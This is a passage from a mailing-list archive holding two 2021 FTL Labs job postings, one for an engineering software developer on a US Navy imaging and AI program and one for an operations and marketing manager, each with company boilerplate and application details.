Labs in Amherst, MA has recently been awarded an exciting 12 to 18-month program with the US Navy that employs cutting-edge image acquisition, 3D modeling, and artificial intelligence to solve maintenance and readiness challenges. We are seeking a full-time Engineering Software Developer with technical software development skills for desktop and Android platforms to address this specific challenge. Relevant skills include the following: C#, WPF, C++, SQL, Python Machine vision, image processing, and target recognition 3D graphics, modeling, transforms, and visualization Mathematical modelling and algorithms (MATLAB, R) Machine learning, neural nets, AI Database and cloud architectures Visualization and manipulation of large data sets Photogrammetry, point clouds, and digitization of physical environments Self-motivated and goal oriented Fun and easy to work with in a dynamic team Bachelor's degree or its equivalent with a minimum of 5 years of experience. Due to the nature of our work for the U.S. Government, we are required to hire U.S. Citizens. We apologize for not having more hiring flexibility. $62,000 to $95,000 Annually 401K, Dental, Life, Medical Full-Time Work from home will be necessary during COVID distancing restrictions and could be acceptable generally. FTL Labs is in the vibrant intellectual community of western Massachusetts, close to the University of Massachusetts flagship campus and Amherst College. Pay is commensurate with experience. We offer competitive compensation and benefits, including excellent health and dental coverage, short- and long-term disability, life insurance, profit-sharing, and 401k with employer contribution. During the COVID public health emergency all FTL employees are telecommuting, and we look forward to returning to our office in Amherst when we can ensure it will not endanger the health or safety of our staff. *APPLICATION INSTRUCTIONS:* Please email your resume and 3 references (at least 2 professional contacts) to kristie at ftllabscorp.com and mike at ftllabscorp.com. *ABOUT FTL LABS:* FTL Labs Corporation is a tight-knit association of Ph.D. scientists and seasoned engineers who work to develop next-generation software and technology products to solve problems for government and industrial clients. FTL personnel have participated in Phase I, Phase II, and Phase III Small Business Innovation Research (SBIR) programs through the National Science Foundation, Department of Defense, and NASA, and we strive to transition these technologies to the market. We frequently collaborate with both academic and industry leaders, such as UMass Amherst, Northrop Grumman and Sikorsky. Our work demonstrates innovative thinking in a team setting across a wide range of fields and specialties, including: * Machine learning, neural nets, and artificial intelligence * Expertise in optics, ultrasound, image analysis, robotics, and life sciences * Big data analysis, virtual and augmented reality * Custom software solutions FTL Labs is an affirmative action-equal opportunity employer; veterans are encouraged to apply. We comply with all applicable federal, state and local laws regarding recruitment and hiring. All qualified applicants are considered for employment without regard to race, color, religion, sex, sexual orientation, gender identity, national origin, disability, protected veteran status, or any other category protected by applicable federal, state, or local laws. If you are a creative self-starter, technically innovative, and have excellent writing skills, we want to hear from you! -- Martha Marteney She/Her/Hers Bookkeeper and HR Assistant -- FTL Labs Corporation www.ftllabscorp.com 479 West Street Suite 48, Amherst, MA 01002 (413) 992-6075 CONFIDENTIALITY NOTICE: This e-mail communication and any attachments may contain confidential or privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution, or copying of it or its contents is prohibited. If you have received this message in error, please promptly notify the sender or admin at ftllabscorp.com ?and immediately delete this message and any attachments from your system. -------------- next part -------------- An HTML attachment was scrubbed... URL: From martha at ftllabscorp.com Wed Feb 24 14:07:42 2021 From: martha at ftllabscorp.com (Martha Marteney) Date: Wed, 24 Feb 2021 09:07:42 -0500 Subject: [Hidden-tech] JOB: Operations/Project Manager and R&D Marketing Assistant Message-ID: *ABOUT THE POSITION:* FTL Labs is seeking an Operations/Project Manager and R&D Marketing Assistant who will be responsible for the coordination, growth, and profitability of the company. The person in this role will support and/or oversee multiple business functions, including project and property management, and marketing and communication. The role reports to the Chief Executive Officer (CEO) and has no direct supervisory role. Job Responsibilities: facilitating management decision processes, resources and operations decisions, and business development tasks such as FTL branding, newsletter, website development and upkeep, and public relations. Job Duties: ? Create and implement a business and marketing plan ? Manage external relationships and communications with potential commercial customers and partners ? Develop and implement guidelines for internal and external communications, which includes reviewing website and newsletter content, proposals, progress reports, etc. ? Track hardware and software deliverables to ensure contract compliance ? Oversee employee productivity ? Provide direction on staff development strategies ? Ensure compliance with federal requirements for defense contracts, such as property management and cybersecurity protocols ? Oversee FTL patents ? Responsible for keeping various government systems up-to-date, such as SAM Skills that would be advantageous include, but are not limited to: ? Analytical skills to evaluate data and make operational decisions ? Excellent written and verbal communication skills ? Proficiency in general business software (Microsoft Office, GSuite) and aptitude to learn new applications ? Able to balance big picture thinking with high detail orientation ? Preferred: experience managing government contracts (FAR) Master?s or Bachelor's degree candidates in Management, Business Administration, or related field with a minimum of 3-5 years of experience will be considered. $?? Per hour (40 hours/week) Work from home will be necessary during COVID distancing restrictions and could be acceptable generally. FTL Labs is in the vibrant intellectual community of western Massachusetts, close to the University of Massachusetts flagship campus and Amherst College. Pay is commensurate with experience. We offer competitive compensation and benefits, including excellent health and dental coverage, short- and long-term disability, life insurance, profit-sharing, and 401k with employer contribution. During the COVID public health emergency all FTL employees are telecommuting, and we look forward to returning to our office in Amherst when we can ensure it will not endanger the health or safety of our staff. *APPLICATION INSTRUCTIONS:* Please email your resume and 3 references (at least 2 professional contacts) to FTL?s Bookkeeper and HR Assistant, Martha Marteney, at martha at ftllabscorp.com. *ABOUT FTL LABS:* FTL Labs Corporation is a tight-knit association of Ph.D. scientists and seasoned engineers who work to develop next-generation software and technology products to solve problems for government and industrial clients. FTL personnel have participated in Phase I, Phase II, and Phase III Small Business Innovation Research (SBIR) programs through the National Science Foundation, Department of Defense, and NASA, and we strive to transition these technologies to the market. We frequently collaborate with both academic and industry leaders, such as UMass Amherst, Northrop Grumman and Sikorsky. Our work demonstrates innovative thinking in a team setting across a wide range of fields and specialties, including: * Machine learning, neural nets, and artificial intelligence * Expertise in optics, ultrasound, image analysis, robotics, and life sciences * Big data analysis, virtual and augmented reality * Custom software solutions FTL Labs is an affirmative action-equal opportunity employer; veterans are encouraged to apply. We comply with all applicable federal, state and local laws regarding recruitment and hiring. All qualified applicants are considered for employment without regard to race, color, religion, sex, sexual orientation, gender identity, national origin, disability, protected veteran status, or any other category protected by applicable federal, state, or local laws. If you are a creative self-starter, technically innovative, and have excellent writing skills, we want to hear from you! -- Martha Marteney She/Her/Hers Bookkeeper and HR Assistant -- FTL Labs Corporation www.ftllabscorp.com 479 West Street Suite 48, Amherst, MA 01002 (413) 992-6075 CONFIDENTIALITY NOTICE: This e-mail communication and any attachments may contain confidential or privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution, or copying of it or its contents is prohibited. If you have received this message in error, please promptly notify the sender or admin at ftllabscorp.com ?and immediately delete this message and any attachments from your system. -------------- next part -------------- An HTML attachment was scrubbed... URL: